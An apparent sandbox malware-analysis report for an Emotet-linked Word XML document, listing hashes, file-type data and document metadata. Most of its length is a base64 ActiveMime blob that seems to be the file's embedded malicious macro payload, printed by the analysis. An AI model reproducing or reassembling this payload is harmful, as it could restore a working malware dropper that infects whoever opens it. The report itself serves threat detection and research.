File name: | BESTELLDETAILS_eDATEI.doc |
Full analysis: | https://app.any.run/tasks/5c5e0f0d-5d83-4bbe-81a2-971903ec9210 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 23, 2019, 08:58:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 62ABA45D0236451B22C3DE3CDF4FF4CC |
SHA1: | 6E55474451301401E24C7443979E1A9723771F4F |
SHA256: | 0B9CCB04553BA5F1CE784630EF9B2C478ED13A96E89C65DCD9C94205C235EA12 |
SSDEEP: | 3072:7kZ2tiOgmunCTcfjL/xSu90OoiLuDKZXfwKeljR1z:7kgNuCTcfxUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (60.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (28.6) |
.xaml | | | Microsoft Extensible Application Markup Language (7.7) |
.xml | | | Generic XML (ASCII) (2.1) |
.html | | | HyperText Markup Language (1.2) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://02000001.jpg |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 00F17EA2 |
WordDocumentBodySectPRsidRDefault: | 00187F7A |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 00187F7A |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | 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 